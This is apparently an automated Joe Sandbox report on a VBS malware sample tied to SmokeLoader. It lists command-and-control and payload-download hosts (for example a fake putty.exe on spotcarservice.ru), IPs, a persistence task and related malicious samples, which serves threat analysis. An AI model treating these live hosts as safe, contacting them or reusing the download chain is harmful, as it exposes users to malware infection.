                http://spotcarservice.ru/fdjskf88cvt/0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf88cvt/yu0%Avira URL Cloudsafe
                http://www.foreca.com0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf80%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf88cvt/yumb0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf88cvt/yumba/putt0%Avira URL Cloudsafe
                http://spotcarservice.ru/fd0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf88cvt/yumba0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf88cvt/yumba/putty0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf88cvt/yumba/0%Avira URL Cloudsafe
                http://restructurisationservice.ru/0%Avira URL Cloudsafe
                http://spotcarservice.ru0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf88cvt/yum0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf88cvt/yumba/putty.e0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                constractionscity1991.lat
                94.156.177.51
                truefalse
                  high
                  restructurisationservice.ru
                  94.156.177.51
                  truefalse
                    high
                    spotcarservice.ru
                    94.156.177.51
                    truefalse
                      high
                      connecticutproperty.ru
                      194.85.61.76
                      truefalse
                        high
                        s-part-0035.t-0009.t-msedge.net
                        13.107.246.63
                        truefalse
                          high
                          time.windows.com
                          unknown
                          unknownfalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            http://constractionscity1991.lat/true
                            • Avira URL Cloud: safe
                            unknown
                            http://connecticutproperty.ru/true
                            • Avira URL Cloud: safe
                            unknown
                            http://spotcarservice.ru/fdjskf88cvt/yumba/putty.exetrue
                            • Avira URL Cloud: safe
                            unknown
                            http://restructurisationservice.ru/true
                            • Avira URL Cloud: safe
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000005.00000000.1477420367.0000000008F09000.00000004.00000001.00020000.00000000.sdmpfalse
                              high
                              https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actuaexplorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                high
                                http://spotcarservice.ru/fdjskf88cpowershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                  high
                                  https://www.pollensense.com/explorer.exe, 00000005.00000000.1475786378.00000000071B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.msn.com:443/v1/news/Feed/Windows?texplorer.exe, 00000005.00000000.1475786378.0000000007276000.00000004.00000001.00020000.00000000.sdmpfalse
                                    high
                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                      high
                                      http://spotcarservice.ru/fdjspowershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-worldexplorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                        high
                                        https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          high
                                          https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winterexplorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                            high
                                            https://contoso.com/Licensepowershell.exe, 00000002.00000002.1434237324.0000021A3BAE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://spotcarservice.ru/fdjskf88cvt/yumba/pupowershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://spotcarservice.ru/fdjskf88cvt/yumba/putty.expowershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://spotcarservice.ru/fdjskf88cvt/yumba/ppowershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://spotcarservice.ru/fdjskf88cvt/yumba/putty.powershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/viexplorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                high
                                                https://excel.office.comexplorer.exe, 00000005.00000000.1479537747.000000000C091000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  high
                                                  https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-explorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-bexplorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      high
                                                      http://schemas.microexplorer.exe, 00000005.00000000.1476594910.0000000007C70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1477093361.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1477105934.0000000008820000.00000002.00000001.00040000.00000000.sdmpfalse
                                                        high
                                                        http://spotcarservice.ru/fdjpowershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://spotcarservice.ru/fdjskf88powershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINtexplorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          high
                                                          http://spotcarservice.ru/fdjskf88cvtpowershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-explorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            high
                                                            https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              high
                                                              http://spotcarservice.ru/fdjskf88cvpowershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://spotcarservice.ru/powershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://contoso.com/powershell.exe, 00000002.00000002.1434237324.0000021A3BAE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1415473308.0000021A2D6C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1434237324.0000021A3BAE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://spotcarservice.ru/fdjskpowershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-itexplorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&ocexplorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://wns.windows.com/explorer.exe, 00000005.00000000.1477420367.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1415473308.0000021A2BA71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://spotcarservice.ru/fpowershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://spotcarservice.ru/fdjskf88cvt/yumba/putty.exeppowershell.exe, 00000002.00000002.1415473308.0000021A2BC92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://spotcarservice.ru/fdjskf88cvt/yumba/putpowershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://spotcarservice.rpowershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000005.00000000.1479537747.000000000C3F7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1415473308.0000021A2D6C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1434237324.0000021A3BC8F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1434237324.0000021A3BAE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://spotcarservice.ru/fdjskfpowershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://word.office.comexplorer.exe, 00000005.00000000.1479537747.000000000C091000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsmexplorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1415473308.0000021A2BC92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1415473308.0000021A2BC92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://go.micropowershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://spotcarservice.ru/fdjskf88cvt/ypowershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://spotcarservice.ru/fdjskf88cvt/powershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://spotcarservice.ru/fdjskf88cvt/yupowershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://contoso.com/Iconpowershell.exe, 00000002.00000002.1434237324.0000021A3BAE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-darkexplorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://spotcarservice.ru/fdjskf8powershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgexplorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://powerpoint.office.comexplorer.exe, 00000005.00000000.1479537747.000000000C091000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://www.foreca.comexplorer.exe, 00000005.00000000.1475786378.00000000071B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://outlook.comexplorer.exe, 00000005.00000000.1479537747.000000000C091000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://spotcarservice.ru/fdjskf88cvt/yumbpowershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://spotcarservice.ru/fdjskf88cvt/yumba/puttpowershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1415473308.0000021A2BC92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://spotcarservice.ru/fdjskf88cvt/yumbapowershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://spotcarservice.ru/fdpowershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://android.notify.windows.com/iOSexplorer.exe, 00000005.00000000.1477420367.000000000913F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://spotcarservice.ru/fdjskf88cvt/yumba/puttypowershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000005.00000000.1477420367.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://spotcarservice.ru/fdjskf88cvt/yumba/powershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://api.msn.com/explorer.exe, 00000005.00000000.1477420367.0000000008F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://aka.ms/pscore68powershell.exe, 00000002.00000002.1415473308.0000021A2BA71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://spotcarservice.ru/fdjskf88cvt/yumba/putty.epowershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.msn.com:443/en-us/feedexplorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://spotcarservice.rupowershell.exe, 00000002.00000002.1415473308.0000021A2BC92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1415473308.0000021A2D69A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1415473308.0000021A2D332000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      http://spotcarservice.ru/fdjskf88cvt/yumpowershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://www.msn.com/en-us/weather/topstories/accuweather-el-niexplorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        • No. of IPs < 25%
                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                        • 75% < No. of IPs
                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                        94.156.177.51
                                                                                                                        constractionscity1991.latBulgaria
                                                                                                                        43561NET1-ASBGfalse
                                                                                                                        194.85.61.76
                                                                                                                        connecticutproperty.ruRussian Federation
                                                                                                                        48287RU-CENTERRUfalse
                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                        Analysis ID:1578026
                                                                                                                        Start date and time:2024-12-19 07:51:09 +01:00
                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                        Overall analysis duration:0h 7m 19s
                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                        Report type:full
                                                                                                                        Cookbook file name:default.jbs
                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                        Number of analysed new started processes analysed:10
                                                                                                                        Number of new started drivers analysed:0
                                                                                                                        Number of existing processes analysed:0
                                                                                                                        Number of existing drivers analysed:0
                                                                                                                        Number of injected processes analysed:1
                                                                                                                        Technologies:
                                                                                                                        • HCA enabled
                                                                                                                        • EGA enabled
                                                                                                                        • AMSI enabled
                                                                                                                        Analysis Mode:default
                                                                                                                        Analysis stop reason:Timeout
                                                                                                                        Sample name:#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbs
                                                                                                                        renamed because original name is a hash value
                                                                                                                        Original Sample Name:-i .vbs
                                                                                                                        Detection:MAL
                                                                                                                        Classification:mal100.troj.expl.evad.winVBS@7/5@5/2
                                                                                                                        EGA Information:
                                                                                                                        • Successful, ratio: 66.7%
                                                                                                                        HCA Information:
                                                                                                                        • Successful, ratio: 98%
                                                                                                                        • Number of executed functions: 35
                                                                                                                        • Number of non-executed functions: 14
                                                                                                                        Cookbook Comments:
                                                                                                                        • Found application associated with file extension: .vbs
                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                        • Excluded IPs from analysis (whitelisted): 40.81.94.65, 13.107.246.63, 4.245.163.56
                                                                                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, twc.trafficmanager.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                        • Execution Graph export aborted for target powershell.exe, PID 2868 because it is empty
                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                        TimeTypeDescription
                                                                                                                        01:52:18API Interceptor34x Sleep call for process: powershell.exe modified
                                                                                                                        01:52:35API Interceptor273437x Sleep call for process: explorer.exe modified
                                                                                                                        07:52:48Task SchedulerRun new task: Firefox Default Browser Agent C7AAB35A03168005 path: C:\Users\user\AppData\Roaming\daersgt
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        94.156.177.51#U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.jsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                        • restructurisationservice.ru/
                                                                                                                        #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                        • restructurisationservice.ru/
                                                                                                                        #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U0414#U043e#U0433#U043e#U0432i#U0440.jsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                        • restructurisationservice.ru/
                                                                                                                        194.85.61.76Quotation sheet.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                        • www.mrpokrovskii.pro/2pji/
                                                                                                                        PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.mrpokrovskii.pro/2pji/
                                                                                                                        Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.mrpokrovskii.pro/2pji/
                                                                                                                        payments.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.mrpokrovskii.pro/2pji/
                                                                                                                        RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.vpnboo.online/4kww/
                                                                                                                        LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.vpnboo.online/m5yo/
                                                                                                                        Yofmdizwhylbef.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                        • www.xn--d1acnfnmta.xn--p1ai/pn4e/?gc=raMz3&l2-nV=Axqd9uYmYp7orgQRubN12KIz0ETn9asgfk1mJK/Z6DbIFwnZ/4JiG197Yvj4xywBazNpNhV4fsXABdsflsvFVf+OSeCGS2bZ+rXq8mGhIxid
                                                                                                                        Nbvkrvfanxfmla.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                        • www.xn--d1acnfnmta.xn--p1ai/pn4e/?KfTD=Axqd9uYmYp7orgQRubN12KIz0ETn9asgfk1mJK/Z6DbIFwnZ/4JiG197Yvj4xywBazNpNhV4fsXABdsflsvXc8+TStbsRm/06Q==&pd=8k02Xq71ReL2NgiL
                                                                                                                        FATURA_DE_PAGAMENTO.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.barbershoploft.ru/de12/?WL08l6oh=z2MmLdpGYTzXqHttvHkhuP8LzrYrvN86bq5ZbTeVah9RZm+7kleL13c93Bfr74AMZ8sc&8pXDi=4hc4dRq
                                                                                                                        CRD_NT_INV-2306020237.vbsGet hashmaliciousFormBookBrowse
                                                                                                                        • www.landlotto.ru/8bfi/?ppsmY9n=A2R81uzLvS0WmEZs04/BP8N0Gjc/1cZcLvuM3RKwCSd5NfyML6VBFcfDSbjtAw22etViIiX2xpSo0klfeHLPYGaSbH+bfsHC3w==&Yrb=gZtNM
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        constractionscity1991.lat#U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.jsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                        • 94.156.177.51
                                                                                                                        #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                        • 94.156.177.51
                                                                                                                        #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U0414#U043e#U0433#U043e#U0432i#U0440.jsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                        • 94.156.177.51
                                                                                                                        restructurisationservice.ru#U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.jsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                        • 94.156.177.51
                                                                                                                        #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                        • 94.156.177.51
                                                                                                                        #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U0414#U043e#U0433#U043e#U0432i#U0440.jsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                        • 94.156.177.51
                                                                                                                        spotcarservice.ru#U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.jsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                        • 94.156.177.51
                                                                                                                        #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                        • 94.156.177.51
                                                                                                                        #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U0414#U043e#U0433#U043e#U0432i#U0440.jsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                        • 94.156.177.51
                                                                                                                        s-part-0035.t-0009.t-msedge.netdoc55334.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 13.107.246.63
                                                                                                                        3DI3mOIlxE.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                        • 13.107.246.63
                                                                                                                        s4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                                                                                                        • 13.107.246.63
                                                                                                                        http://mee6.xyzGet hashmaliciousUnknownBrowse
                                                                                                                        • 13.107.246.63
                                                                                                                        http://johnlewisfinance.qa.uinsure.co.ukGet hashmaliciousUnknownBrowse
                                                                                                                        • 13.107.246.63
                                                                                                                        Configurator.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • 13.107.246.63
                                                                                                                        https://shorturl.at/roHtaGet hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 13.107.246.63
                                                                                                                        https://www.google.com/url?q=https%3A%2F%2Fjollybos.es%2Fwills&sa=D&sntz=1&usg=AOvVaw1qWh2KPHS1VH9DwguQzCFrGet hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 13.107.246.63
                                                                                                                        1734537007a22115ccf81804870f6743791426a5c4263cfc792e757756373d12e0d21d0600610.dat-decoded.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                        • 13.107.246.63
                                                                                                                        7KAYnROp5y.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                        • 13.107.246.63
                                                                                                                        connecticutproperty.ru#U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.jsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                        • 109.70.26.37
                                                                                                                        #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                        • 109.70.26.37
                                                                                                                        #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U0414#U043e#U0433#U043e#U0432i#U0440.jsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                        • 109.70.26.37
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        RU-CENTERRU#U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.jsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                        • 109.70.26.37
                                                                                                                        #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                        • 109.70.26.37
